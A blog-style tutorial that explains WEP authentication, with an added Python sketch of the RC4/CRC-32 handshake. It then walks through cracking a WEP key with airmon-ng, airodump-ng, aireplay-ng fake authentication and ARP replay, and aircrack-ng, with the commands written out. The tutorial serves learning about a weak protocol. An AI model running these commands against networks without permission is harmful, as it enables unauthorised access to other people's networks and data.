
WEP WiFi Password Cracking

WEP WiFi Password Cracking / Wireless Hacking

Hi !

In this post I’ll explain how the WEP (Wired Equivalent Privacy) wireless security protocol works and show how to bypass it.

First, we’ll look at the working principle of the WEP algorithm. If a client wants to connect to a wireless network encrypted with the WEP algorithm, the following happens in order.

Connecting to a wireless network encrypted with WEP (4 steps in total):

1 – The client sends a connection request to the Access Point.

2 – The AP (Access Point) generates a random plain text and sends it to the client.

3 – The client encrypts the plain text received from the AP with its own WEP key (the WEP key is a secret key) and sends this encrypted text to the AP.

4 – The AP decrypts the encrypted text received from the client with the WEP key. If the received text is correct, it sends an accept message to the client.

There are three important purposes of the WEP algorithm:

  1. Identity Verification
  2. Privacy
  3. Message Modification Control
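
The four-step exchange and the three purposes listed above, as an added example that is not part of the original post: a Python sketch of WEP shared-key authentication, with RC4 seeded by a 24-bit IV followed by the key (privacy) and a CRC-32 integrity check value (message modification control). The key, the function names and the simplified message layout (no 802.11 frame headers) are assumptions made for illustration.

```python
import os
import zlib

def rc4(seed: bytes, data: bytes) -> bytes:
    """RC4: key scheduling over the seed, then XOR data with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + seed[i % len(seed)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")

def client_response(wep_key: bytes, challenge: bytes, iv: bytes) -> bytes:
    """Step 3: encrypt challenge + ICV under RC4(IV || key); the IV is sent in clear."""
    return iv + rc4(iv + wep_key, challenge + icv(challenge))

def ap_verify(wep_key: bytes, challenge: bytes, response: bytes) -> bool:
    """Step 4: decrypt with the AP's key, then check the ICV and the challenge text."""
    iv, body = response[:3], response[3:]
    plain = rc4(iv + wep_key, body)
    text, check = plain[:-4], plain[-4:]
    return check == icv(text) and text == challenge

def handshake(client_key: bytes, ap_key: bytes) -> bool:
    """Steps 2-4 end to end; returns True when the AP would accept the client."""
    challenge = os.urandom(128)   # step 2: AP generates the random plain text
    iv = os.urandom(3)            # 24-bit IV chosen by the client
    return ap_verify(ap_key, challenge, client_response(client_key, challenge, iv))

if __name__ == "__main__":
    key = bytes.fromhex("0102030405")   # constructed 40-bit WEP key
    print("matching key:", handshake(key, key))
    print("wrong key:   ", handshake(b"\x00" * 5, key))
```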

How to capture the password of a wireless network encrypted with WEP

Before we start, we can use this command to learn the MAC address of our device:

>> iwconfig or ifconfig

BSSID : Destination MAC Address

ESSID : Name of the destination wireless network

Channel : Broadcast channel number

Now we’ll use the aircrack family of WiFi hacking tools in Kali Linux to crack the password. As hardware, we’ll use an Asus USB-N14 300 Mbps adapter.

We’ll use this command to change to monitor mode:

>> airmon-ng start wlan0 or iwconfig wlan0 mode monitor

After this step, wlan0 will be renamed to wlan0mon!

To gather information by sniffing the environment:

>> airodump-ng wlan0mon

This command will show us the BSSID, ESSID and channel info.

>> airodump-ng wlan0mon -c 10 --bssid 4C:HF:78:TY:8T:4E -w wifi_hack

# This command saves the gathered packets to the current directory (-w parameter).

Now we’ll create a fake authentication to gather the packets more quickly.

To do this:

>> aireplay-ng -1 1 -a 4C:HF:78:TY:8T:4E -h D8:8L:0T:E9:12:7A wlan0mon

We created the fake authentication with the “-1” parameter and specified how many seconds to send with the “1” argument.

We specified the BSSID (Destination MAC Address) with the “-a” parameter and entered the MAC address of our device with the “-h” parameter.

>> aireplay-ng -3 -b 4C:HF:78:TY:8T:4E -h D8:8L:0T:E9:12:7A wlan0mon

This command continuously gathers ARP packets and then generates IV (Initialization Vector) packets, repeating this continuously.

>> aircrack-ng wifi_hack.cap

We can crack the password with this command once enough packets have been gathered.

“Thanks for reading.”

That’s all for now.

